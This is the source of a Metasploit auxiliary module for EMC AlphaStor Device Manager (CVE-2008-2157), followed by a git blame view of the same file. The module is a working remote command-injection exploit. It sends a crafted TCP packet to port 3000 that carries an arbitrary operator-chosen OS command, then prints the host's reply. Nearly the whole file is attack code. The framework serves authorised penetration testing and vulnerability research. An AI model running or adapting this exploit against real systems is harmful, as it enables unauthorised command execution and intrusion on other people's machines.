modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'EMC AlphaStor Device Manager Arbitrary Command Execution',
      'Description'    => %q{
          EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability
          because the application fails to properly sanitize user-supplied input.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ],
          [ 'OSVDB', '45715' ],
          [ 'CVE', '2008-2157' ],
          [ 'BID', '29398' ],
        ],
      'DisclosureDate' => '2008-05-27'))

      register_options(
        [
          Opt::RPORT(3000),
          OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),
        ])
  end

  def run
    connect

    data = "\x75" + datastore['CMD']
    pad  = "\x00" * 512

    pkt = data + pad

    print_status("Sending command: #{datastore['CMD']}")
    sock.put(pkt)

    # try to suck it all in.
    select(nil,nil,nil,5)

    res = sock.get_once || ''

    res.each_line do |info|
      print_status("#{info.gsub(/[^[:print:]]+/,"")}") # hack.
    end

    disconnect
  rescue ::Rex::ConnectionError => e
    print_error 'Connection failed'
  rescue ::EOFError => e
    print_error 'No reply'
  end
end
added auxiliary/exploits modules for emc alphastor. 2008-09-01 11:28:55 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
added auxiliary/exploits modules for emc alphastor. 2008-09-01 11:28:55 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary/exploits modules for emc alphastor. 2008-09-01 11:28:55 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'EMC AlphaStor Device Manager Arbitrary Command Execution',`
			`'Description' => %q{`
			`EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability`
			`because the application fails to properly sanitize user-supplied input.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '45715' ],`
fixed the cve entrys. 2009-10-14 11:45:14 +00:00			`[ 'CVE', '2008-2157' ],`
added auxiliary/exploits modules for emc alphastor. 2008-09-01 11:28:55 +00:00			`[ 'BID', '29398' ],`
			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2008-05-27'))`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`register_options(`
added auxiliary/exploits modules for emc alphastor. 2008-09-01 11:28:55 +00:00			`[`
			`Opt::RPORT(3000),`
			`OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
added auxiliary/exploits modules for emc alphastor. 2008-09-01 11:28:55 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary/exploits modules for emc alphastor. 2008-09-01 11:28:55 +00:00			`def run`
			`connect`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary/exploits modules for emc alphastor. 2008-09-01 11:28:55 +00:00			`data = "\x75" + datastore['CMD']`
			`pad = "\x00" * 512`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`pkt = data + pad`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`print_status("Sending command: #{datastore['CMD']}")`
added auxiliary/exploits modules for emc alphastor. 2008-09-01 11:28:55 +00:00			`sock.put(pkt)`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary/exploits modules for emc alphastor. 2008-09-01 11:28:55 +00:00			`# try to suck it all in.`
See #2134 . Fixes all aux modules that uses sleep(). 2010-06-22 18:58:38 +00:00			`select(nil,nil,nil,5)`
Retab modules 2013-08-30 16:28:54 -05:00
Handle nil for get_once 2012-06-04 15:31:10 -05:00			`res = sock.get_once \|\| ''`
Retab modules 2013-08-30 16:28:54 -05:00
Handle nil for get_once 2012-06-04 15:31:10 -05:00			`res.each_line do \|info\|`
Killing puts. 2011-09-11 02:42:39 +00:00			`print_status("#{info.gsub(/[^[:print:]]+/,"")}") # hack.`
added auxiliary/exploits modules for emc alphastor. 2008-09-01 11:28:55 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary/exploits modules for emc alphastor. 2008-09-01 11:28:55 +00:00			`disconnect`
Catch EOFError - Fix #12061 2019-07-26 23:53:46 +00:00			`rescue ::Rex::ConnectionError => e`
			`print_error 'Connection failed'`
			`rescue ::EOFError => e`
			`print_error 'No reply'`
added auxiliary/exploits modules for emc alphastor. 2008-09-01 11:28:55 +00:00			`end`
fixed the cve entrys. 2009-10-14 11:45:14 +00:00			`end`